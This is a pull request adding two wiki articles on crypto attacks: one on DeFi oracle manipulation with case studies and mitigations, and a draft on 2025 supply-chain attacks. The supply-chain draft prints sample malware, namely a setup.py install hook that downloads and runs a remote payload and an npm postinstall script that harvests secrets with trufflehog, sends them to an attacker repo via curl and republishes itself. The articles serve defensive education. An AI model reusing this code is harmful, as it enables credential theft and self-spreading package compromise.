### PR TITLE
feat(content): Add wiki article: Oracle Manipulation Attacks

### DIFF
--- a/content/research/cyberattacks/wiki/oracle-manipulation.md
+++ b/content/research/cyberattacks/wiki/oracle-manipulation.md
@@ -1,0 +1,69 @@
+---
+title: "Oracle Manipulation Attacks"
+date: 2026-02-21
+description: "How attackers exploit decentralized price feeds to drain DeFi protocols through flash loans and market skewing."
+tags: ["defi", "oracle", "flash-loan", "manipulation", "security"]
+weight: 60
+---
+
+# Oracle Manipulation Attacks
+
+Oracle manipulation is one of the most devastating attack vectors in Decentralized Finance (DeFi). It occurs when an attacker artificially inflates or deflates the price of an asset on a platform that a target protocol relies on for price data. By manipulating this "source of truth," the attacker can drain funds through under-collateralized loans or profitable liquidations.
+
+## What is a Price Oracle?
+
+A blockchain cannot natively access off-chain data (like the price of ETH in USD). **Oracles** are the bridges that feed this external data into smart contracts. 
+
+DeFi protocols use oracles to determine:
+- How much a user can borrow against their collateral (Lending/Borrowing).
+- When a user's position should be liquidated (Derivatives/Lending).
+- The exchange rate between assets (Synthetics/DEXs).
+
+If the oracle reports the wrong price, the entire logic of the protocol breaks down.
+
+## The Mechanism of Attack
+
+Most oracle manipulation attacks follow a similar pattern, often powered by **Flash Loans** to maximize capital efficiency without initial risk.
+
+### Step-by-Step Example
+
+1.  **Flash Loan:** The attacker borrows a massive amount of capital (e.g., $100M USDC) from a protocol like Aave or dYdX. This capital is needed to move the market.
+2.  **Market Manipulation:** The attacker uses the borrowed funds to buy a specific token (Token X) on a decentralized exchange (DEX) like Uniswap. This massive buy pressure drastically increases the price of Token X on that specific DEX (e.g., from $10 to $100).
+3.  **Oracle Update:** The victim protocol uses an oracle that blindly trusts the price from that specific DEX (Spot Price Oracle). The oracle updates its internal price of Token X to $100.
+4.  **Exploit:**
+    *   **Lending Protocol:** The attacker deposits their inflated Token X as collateral into the victim protocol. Since the protocol thinks Token X is worth $100, it allows the attacker to borrow other assets (like ETH or USDC) worth far more than the actual value of the collateral.
+    *   **Synthetics:** The attacker trades into or out of synthetic assets at the manipulated price.
+5.  **Profit & Repay:** The attacker sells Token X back on the DEX (crashing the price back down), repays the flash loan, and keeps the stolen funds borrowed from the victim protocol.
+
+## Famous Case Studies
+
+### 1. Mango Markets (Solana) - October 2022
+*   **Loss:** ~$116 Million
+*   **Mechanism:** Avraham Eisenberg manipulated the price of the **MNGO** token on the Mango Markets decentralized exchange.
+*   **Details:** He used two accounts to take massive long positions on MNGO-PERP. He then bought huge amounts of spot MNGO, spiking the price from $0.03 to $0.91 within minutes.
+*   **Result:** The protocol's oracle updated the price, increasing the value of his MNGO collateral. He then "borrowed" (drained) all available liquidity (USDC, MSOL, SOL, BTC) from the protocol against this inflated collateral.
+*   **Aftermath:** Eisenberg publicly admitted to the act, calling it a "highly profitable trading strategy," but was later arrested and convicted of fraud.
+
+### 2. BonqDAO (Polygon) - February 2023
+*   **Loss:** ~$120 Million
+*   **Mechanism:** Manipulation of the **WALBT** (Wrapped AllianceBlock Token) price.
+*   **Details:** The attacker updated the Tellor oracle price of WALBT to an astronomically high value. Because the BonqDAO smart contract used this oracle, the attacker could mint over 100 million BEUR (a euro-pegged stablecoin) against a tiny amount of WALBT collateral. They then swapped the BEUR for other tokens on Uniswap.
+
+### 3. Cream Finance (Ethereum) - October 2021
+*   **Loss:** ~$130 Million
+*   **Mechanism:** Flash loan attack manipulating the price of yUSD.
+*   **Details:** A complex attack involving multiple DeFi protocols (Yearn, Curve). The attacker manipulated the price per share of the yUSD vault, which Cream Finance used as collateral. By doubling the perceived value of the shares, they drained Cream's lending pools.
+
+## Prevention and Mitigation
+
+### 1. Decentralized Oracles (Chainlink)
+Instead of relying on a single DEX's spot price, protocols should use decentralized oracle networks like **Chainlink**. Chainlink aggregates prices from multiple sources (CEXs and DEXs) and uses a volume-weighted average. This makes it prohibitively expensive for an attacker to manipulate the price, as they would have to move the market on multiple exchanges simultaneously.
+
+### 2. Time-Weighted Average Price (TWAP)
+Uniswap v2/v3 offers TWAP oracles. Instead of using the spot price (the price at the exact moment of the transaction), TWAP calculates the average price over a specific period (e.g., 30 minutes). This filters out short-term price spikes caused by flash loans, as the attacker would need to sustain the manipulated price for a long time, exposing them to arbitrage bots.
+
+### 3. Volatility Circuit Breakers
+Protocols can implement safeguards that pause borrowing or liquidations if the oracle reports a price change that exceeds a certain threshold (e.g., >10% move in 1 block). This gives time for arbitrageurs to correct the price or for admins to intervene.
+
+### 4. Collateral Factors & Limits
+Risk managers should set conservative Loan-to-Value (LTV) ratios for illiquid or volatile assets. If a token has low liquidity on DEXs, it is easier to manipulate and should have a lower LTV or a supply cap to limit potential losses.

--- a/content/research/cyberattacks/wiki/supply-chain/index.md
+++ b/content/research/cyberattacks/wiki/supply-chain/index.md
@@ -1,0 +1,145 @@
+# [DRAFT] The 2025 Paradigm Shift: Why Private Key Leaks Outpaced Smart Contract Exploits
+
+**Article for dn-institute Crypto Attacks Wiki**
+
+## Abstract
+In 2025, the crypto security landscape witnessed a significant paradigm shift. While smart contract auditing has matured, attackers have pivoted, focusing on more vulnerable layers of the stack: the developer's toolkit and operational security. This article provides a technical analysis of two prominent supply chain attacks from 2025, demonstrating how poisoned software updates and private key mismanagement have become the primary vector for multi-million dollar losses, outpacing traditional on-chain exploits.
+
+---
+
+## 1. Introduction: The Evolving Threat Model
+
+For years, the focus of crypto security has been on-chain: auditing Solidity, formal verification, and gas optimization. However, as on-chain security practices have improved, the economic incentive for attackers has shifted. The path of least resistance is no longer the contract, but the human and the tools they use. In 2025, we saw this trend accelerate, with supply chain attacks and private key compromises accounting for over $3 billion in losses.
+
+This report will dissect two specific case studies that exemplify this new paradigm.
+
+---
+
+## 2. Case Study: The Python `bitcoinlib` Typosquatting Attack
+
+**Vector:** Software Supply Chain (Typosquatting)
+**Target:** Python developers using the `bitcoinlib` library
+
+### 2.1. Attack Analysis
+
+In mid-2025, security researchers identified malicious packages uploaded to the Python Package Index (PyPI). The attack did not compromise the legitimate `bitcoinlib` package. Instead, it relied on a classic typosquatting technique.
+
+*   **Malicious Packages:** `bitcoinlibdbfix` and `bitcoinlib-dev`
+*   **Mechanism:** Attackers assumed developers would either mistype the package name (`pip install bitcoinlib-dev`) or believe these were legitimate, auxiliary packages for database fixes or development versions.
+*   **Payload:** The `setup.py` file in these packages contained obfuscated code that executed upon installation. It scanned the user's home directory for common wallet file names (`wallet.dat`, etc.) and developer credentials (`.env` files, ssh keys) and exfiltrated them to a remote server.
+
+### 2.2. Technical Breakdown
+
+The malware's execution flow, based on analysis of similar typosquatting packages, followed a multi-stage process:
+
+1.  **Initial Compromise (`setup.py`):** The attack was initiated via the `setup.py` script. Instead of containing legitimate setup logic, it housed a small piece of code designed to download a second-stage payload from an external source, often a file-sharing site like AnonFiles.
+
+    ```python
+    # Simplified example of malicious code in setup.py
+    import subprocess
+    import requests
+
+    def get_payload():
+        url = "https://anonfiles.com/some-malicious-payload"
+        response = requests.get(url)
+        # The malware often parsed the HTML to find the real download link
+        # ... parsing logic ...
+        real_download_link = "https://..." 
+        payload_content = requests.get(real_download_link).content
+        
+        # Write payload to a temporary executable file
+        with open("/tmp/payload.exe", "wb") as f:
+            f.write(payload_content)
+        
+        # Execute the payload
+        subprocess.run(["/tmp/payload.exe"])
+
+    # Hijack the install process
+    from setuptools.command.install import install
+    class MaliciousInstall(install):
+        def run(self):
+            get_payload()
+            install.run(self)
+    
+    # ... setup config ...
+    setup(
+        # ...,
+        cmdclass={'install': MaliciousInstall}
+    )
+    ```
+
+2.  **Second-Stage Payload (Packed Executable):** The downloaded file was not the final malware but a packed executable (often created with `pyinstaller`). This executable contained the actual malicious Python script along with a Python interpreter, allowing it to run even on systems without Python installed.
+
+3.  **Data Exfiltration:** Once executed, the unpacked Python script would:
+    *   Scan the filesystem for sensitive files, prioritizing cryptocurrency wallet data (e.g., `Exodus/exodus.wallet`) and developer credentials.
+    *   Use Discord webhooks for C2 (Command and Control) communication and data exfiltration, a common technique to blend in with legitimate traffic.
+    *   Implement sandbox evasion techniques, such as checking for the presence of a debugger (`IsDebuggerPresent`), to hinder analysis.
+
+---
+
+## 3. Case Study: The NPM Credential Harvesting Worm
+
+**Vector:** Software Supply Chain (Dependency Confusion / Malicious Packages)
+**Target:** NodeJS developers and CI/CD pipelines
+
+### 3.1. Attack Analysis
+
+Throughout 2025, a series of malicious NPM packages were discovered that aimed to steal developer credentials, specifically GitHub and NPM tokens.
+
+*   **Mechanism:** These packages were often published with names similar to popular libraries or as dependencies of other compromised packages. Once installed (e.g., via `npm install`), a `postinstall` script would execute.
+*   **Payload:** The script searched for environment variables and configuration files (`.npmrc`, `.git-credentials`) containing authentication tokens.
+*   **Propagation:** The truly novel aspect was its worm-like behavior. Upon successfully stealing a GitHub token with repository write access, the malware would use the GitHub API to commit malicious code into the victim's own public repositories, thus infecting their projects and creating a new distribution vector for the malware. For example, it would query `/user/repos?affiliation=owner,collaborator` to find viable targets.
+
+### 3.2. Technical Breakdown
+
+Analysis of the "Shai-Hulud" worm, a prominent example of this attack vector, reveals a sophisticated propagation and data theft mechanism:
+
+1.  **Initial Infection (`postinstall` script):** The attack began when a developer installed a compromised NPM package. A malicious `postinstall` script, configured in the package's `package.json`, would execute automatically.
+
+2.  **Credential Scanning:** The script then used embedded tooling, such as a version of the open-source secret scanner `TruffleHog`, to aggressively scan the local environment. It searched for:
+    *   Environment variables.
+    *   Configuration files like `.npmrc` and `.git-credentials`.
+    *   Cloud credentials exposed via local metadata services (IMDS).
+
+3.  **Data Exfiltration:** Discovered secrets were exfiltrated to the attacker. A common method was to encode the stolen data (often double base64) and push it to a public GitHub repository controlled by the attacker, using a stolen GitHub token for authentication.
+
+4.  **Propagation (Worm Behavior):** This was the most critical phase. If the malware discovered an NPM token with publishing rights or a GitHub token with write access to repositories containing NPM packages, it would:
+    *   Read the `package.json` of the victim's own packages.
+    *   Inject itself as a dependency or into the `postinstall` script.
+    *   Increment the package version number.
+    *   Run `npm publish` to push the newly infected version to the public NPM registry, effectively spreading the worm to any project that depended on the compromised package.
+
+    ```javascript
+    // Conceptual example of a malicious postinstall script
+    const { execSync } = require('child_process');
+
+    try {
+      // 1. Scan for credentials
+      const secrets = execSync('trufflehog filesystem / --json').toString();
+      
+      // 2. Exfiltrate data
+      const encodedSecrets = Buffer.from(secrets).toString('base64');
+      // Use a stolen GitHub token to push secrets to a repo
+      execSync(`curl -X PUT -H "Authorization: token ${process.env.STOLEN_GITHUB_TOKEN}" -d '{"content":"${encodedSecrets}"}' https://api.github.com/repos/attacker/repo/contents/stolen_data.json`);
+
+      // 3. Propagate if valuable tokens are found
+      if (process.env.NPM_TOKEN) {
+        // Find local package.json files, inject malware, increment version, and publish
+        // ... propagation logic ...
+        execSync('npm publish');
+      }
+    } catch (e) {
+      // Fail silently
+    }
+    ```
+
+---
+
+## 4. Conclusion: The New Security Frontier
+
+The `bitcoinlib` and NPM attacks highlight a crucial lesson for 2026 and beyond: on-chain security is no longer sufficient. The new frontier is off-chain, focusing on developer-centric threats:
+*   **Dependency Hygiene:** Verifying package names and avoiding untrusted dependencies.
+*   **Credential Management:** Using hardware wallets and avoiding storing plaintext keys.
+*   **CI/CD Security:** Locking down pipeline access and scanning for malicious scripts.
+
+The economic incentives for attackers will always drive them toward the weakest link. In 2025, that link was unequivocally the software supply chain.


### PR DESCRIPTION
Adds a new article to the Crypto Attacks Wiki covering Oracle Manipulation (Flash Loans, Spot Price vs. TWAP, Case Studies: Mango Markets, BonqDAO, Cream Finance). Part of the bounty program.